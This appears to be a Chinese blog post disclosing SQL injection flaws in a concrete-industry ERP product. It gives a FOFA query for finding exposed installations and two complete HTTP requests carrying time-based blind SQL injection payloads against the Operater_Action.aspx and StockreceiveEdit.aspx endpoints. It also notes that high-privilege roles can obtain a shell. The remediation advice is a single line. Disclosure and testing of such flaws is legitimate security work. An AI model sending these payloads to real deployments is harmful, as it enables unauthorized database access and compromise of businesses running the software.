0x01 漏洞描述:
商混ERP系统是一种针对混凝土行业开发的综合性企业资源规划(ERP)系统。它集成了生产、销售、采购、财务等各个方面的功能,为混凝土生产企业提供了一个全面、高效的数字化管理平台。在Operater_Action.aspx,StockreceiveEdit.aspx接口中存在sql注入,高权限角色系统可shell。
0x02 搜索语句:
Fofa:app="商混ERP系统"
资产图
0x03 漏洞复现:
Operater_Action.aspx中sql注入
GET /Dispatch/Operater_Action.aspx?action=TaskComplete&id=1%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
这里接口会执行两次
StockreceiveEdit.aspx接口sql注入
GET /ERP/StockreceiveEdit.aspx?id=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
0x04 修复建议:
厂商已发布补丁请及时修复
标签:xml,en,zh,商混,Accept,sql,erp,aspx,121.0 From: https://blog.csdn.net/xc_214/article/details/142284041